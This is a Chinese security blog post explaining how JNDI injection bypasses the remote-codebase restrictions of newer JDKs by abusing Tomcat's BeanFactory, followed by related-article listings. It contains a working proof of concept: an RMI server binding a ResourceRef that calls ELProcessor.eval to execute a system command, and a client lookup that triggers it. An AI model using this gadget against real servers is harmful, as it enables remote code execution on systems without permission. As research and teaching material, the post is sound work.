tomcat下jdk高版本的JNDI注入解析

最新推荐文章于 2023-12-25 17:52:35 发布
最新推荐文章于 2023-12-25 17:52:35 发布
阅读量492 收藏 1
点赞数
分类专栏: web安全 文章标签: java jndi注入 tomcat
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49835838/article/details/123448644
版权

前言

经典的JNDI注入在jdk8u191以上的版本默认被限制了加载远程工厂类,但可以通过加载一些特殊的本地工厂,达到执行命令的效果

比如常见的tomcat依赖里的BeanFactory就能实现类似的效果

经典payload

服务端

package org.example.rmi;

import com.sun.jndi.rmi.registry.ReferenceWrapper;

import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.StringRefAddr;
import java.rmi.AlreadyBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

import org.apache.naming.ResourceRef;

public class ReferenceServer {
    public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException {
        Registry registry = LocateRegistry.createRegistry(1099);
        ResourceRef resourceRef = new ResourceRef("javax.el.ELProcessor", (String)null, "", "", true, "org.apache.naming.factory.BeanFactory", (String)null);
        resourceRef.add(new StringRefAddr("forceString", "a=eval"));
        resourceRef.add(new StringRefAddr("a", "Runtime.getRuntime().exec(\"calc\")"));
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(resourceRef);
        registry.bind("aaa", referenceWrapper);
        System.out.println("rmi服务端开启了");

    }
}

客户端

package org.b1ackc4t.se.jndi;

import javax.naming.InitialContext;
import javax.naming.NamingException;

public class JClient {
    public static void main(String[] args) throws NamingException {
//        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
//        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        InitialContext ctx = new InitialContext();
        Object obj = ctx.lookup("rmi://192.168.48.131:1099/aaa");
        System.out.println(obj);
    }
}

探究原理

我们在BeanFactory#getObjectInstance打下断点

在这里插入图片描述
在这里插入图片描述
这里加载了目标类,然后又通过public的无参构造方法创建了对象

在这里插入图片描述
后面再通过forceString传递一个方法名进去,这个方法只能是public,并且只有一个参数是String

在这里插入图片描述
最后调用这个方法

总结

tomcat下的BeanFactory可以实现调用某个类的某个方法,但要满足以下条件

  1. 该类存在一个无参的public构造方法
  2. 被调用的方法必须是public的且只有一个String类型的参数

常用的payload是调用javax.el.ELProcessor#eval,但是这个只有在tomcat8以后才有,存在一定的局限,有大佬也找到了其他可用的姿势,参考:https://tttang.com/archive/1405/

b1ackc4t
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Java代码审计】JNDI+RMI绕过版本JDK的限制
大河之犬的博客
03-08 861
传入的 Reference为 ResourceRef 类,后面通过反射的方式实例化 Reference 所指向的任意 Bean Class,调用 setter 方法为所有的属性赋值,该 Bean Class 的类名、属性、属性值,全都来自于 Reference 对象。因此,实际上我们可以调用任意指定类的任意方法,并指定单个可控的参数。因此,我们实际上可以指定一个存在于目标 classpath 中的工厂类名称,交由这个工厂类去实例化实际的目标类(即引用所指向的类),从而间接实现一定的代码控制。
TomcatJDK版本对应关系以及Tomcat版本特性
01-10
TomcatJDK版本对应关系为: Servlet规格 JSP规范 EL规格 WebSocket规范 JASPIC规格 Apache Tomcat版本 最新发行版本 支持的Java版本 4.0 2.3 3.0 1.1 1.1 9.0.x 9.0.27 8及更版本 3.1 2.3 3.0 1.1 1.1 ...
JDK 8u191之后的JNDI注入(LDAP)》学习
公众号shadow sock7
09-27 4783
参考: 8u191之后的JNDI注入(LDAP) JNDI注入,即某代码中存在JDNI的string可控的情况,可构造恶意RMI或者LDAP服务端,导致远程任意类被加载,造成任意代码执行。 JNDI注入中RMI和LDAP与JDK版本的关系,参考这张图: 来源: https://xz.aliyun.com/t/6633 RMI + JNDI Reference利用方式: JDK 6u132, JD...
JNDI注入之略微学学
qq_53263789的博客
07-18 743
jndi注入
版本JDK下绕过受限JNDI注入进行任意类加载
qq_40466372的博客
07-18 1105
版本JDKJNDI配合Unsafe实现加载任意类
ref 能否注入为null_如何绕过版本JDK限制进行JNDI注入利用
weixin_39783633的博客
12-15 775
//写在前面//Java JNDI注入有很多种不同的利用方式,而这些利用方式的Payload分别有一些限制。在之前《深入理解JNDI注入Java反序列化漏洞利用》中,我们主要讨论的是通过RMI服务返回 JNDI Naming Reference Payload 的攻击手法,除此之外还有 RMI Remote Object Payload、LDAP Naming Reference Pa...
[Java安全]—JNDI注入
Sentiment的博客
07-08 2597
文章首发于Secin:浅析JNDI注入其实应该先学JNDI再学fastjson的,但是JNDI投稿去了,所以就先发了fastjsonTrail: Java Naming and Directory Interface (The Java™ Tutorials) (oracle.com)The JNDI Tutorial (oracle.com)JNDI (Java Naming and Directory Interface) 是一个应用程序设计的 API,为开发人员提供了查找和访问各种命名和目录服务的通用
JNDI注入
qq_64201116的博客
04-20 776
Java命名目录接口(Java Naming and Directory Interface),作用是为JAVA应用程序提供命名和目录访问服务的API(application programming interface)。* 轻量级目录访问协议 (LDAP)* 通用对象请求代理体系结构 (CORBA) 通用对象服务 (COS) 名称服务* Java 远程方法调用 (RMI) 注册表* 域名服务 (DNS)前三种都是支持一种字符串就绑定一种对象注:这里JDNI注入就可以用到我们之前的RMI的知识了。
绕过版本JDK限制的JNDI注入
weixin_45682070的博客
01-21 1626
前言 JNDI_RMI在JDK 6u132, JDK 7u122, JDK 8u113版本中,系统属性 com.sun.jndi.rmi.object.trustURLCodebase;com.sun.jndi.cosnaming.object.trustURLCodcbase 的默认值变为false,即默认不允许从远程的Codebase加载Reference工厂类。 JNDI_LDAP在Oracle JDK 6u211、7u201、8u191、11.0.1、之后 com.sun.jndi.ldap.obj
JNDI注入利用原理及绕过版本JDK限制
mole_exp的博客
11-07 7085
文章目录前言JNDI 101什么是JNDI使用JNDI的好处几个简单的JNDI代码示例1、使用JNDI操作RMI2、使用JNDI操作LDAPJNDI动态协议转换JNDI Naming ReferencesJNDI 注入利用RMI向量LDAP向量其他向量绕过版本JDK限制方式1、利用本地Class作为JNDI Reference Factory方式2、LDAP Server返回序列化数据,触发本地反序列化Gadget坑Reference 前言 关于JNDI注入的讨论和研究,起源于国外的安全研究员@pwnte
如何使用tomcatjndi注入自己的资源
qq_25379811的博客
12-25 411
问题场景: springboot项目启动报如下错误 javax.naming.NamingException: Unexpected exception resolving reference at org.apache.naming.NamingContext.lookup(NamingContext.java:884) ~[tomcat-embed-core-9.0.80.jar:9.0.80] at org.apache.naming.NamingContext.lookup(NamingCont
TomcatJDK版本对应关系.docx
10-12
这篇文章主要介绍了TomcatJDK版本对应关系以及Tomcat版本特性,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值
Linux版本tomcatjdk
03-07
解压后,可得到两个文件,一个是Linux下的tomcat版本为7,另一个是Linux下的jdk版本为1.7.
linux下安装jdktomcat详解
11-11
linux下安装 jdktomcat 详解,详细的指令,自己总结,希望能帮到大家
tomcat10,支持jdk11的哈
08-15
tomcat10,支持jdk11的哈
Java安全』绕过JDK版本限制进行JNDI注入学习研究
Ho1aAs‘s Blog
02-22 2628
文章目录绕过原理使用本地类作为恶意工厂攻击RMI探究BeanFactory类pom.xmlPoCjavax.el.ELProcessorGroovy.lang.GroovyShell引用参考完 绕过原理 对于JDK版本11.0.1、8u191、7u201、6u211及以上,RMI和LDAP的trustURLCodebase已经被限制,但是还存在几种方法绕过 使用受害者本地的类作为恶意Reference Factory攻击RMI 利用LDAP返回序列化数据触发Gadget 使用本地类作为恶意工厂攻击RMI
JNDI注入版本绕过学习
why811的博客
09-06 163
JNDI(Java Naming and Directory Interface)是一个应用程序设计的 API,一种标准的 Java 命名系统接口。JNDI 提供统一的客户端 API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,由管理者将 JNDI API 映射为特定的命名服务和目录系统,使得 Java 应用程序可以和这些命名服务和目录服务之间进行交互。
Java Web】Tomcat JNDI官网文档阅读笔记,JNDI数据源配置,JNDI自定义资源工厂配置
未闻花名丶的博客
04-20 649
Java Web】Tomcat JNDI官网文档阅读笔记,JNDI数据源配置,JNDI自定义资源工厂配置
tomcatjdk版本
最新发布
04-02
- Tomcat 9.x:要求JDK 8或更版本。 - Tomcat 8.x:要求JDK 7或更版本。 - Tomcat 7.x:要求JDK 6或更版本。 请注意,这只是一些常见的对应关系,具体的对应关系可能因Tomcat的具体版本而有所不同。在选择...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

b1ackc4t

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值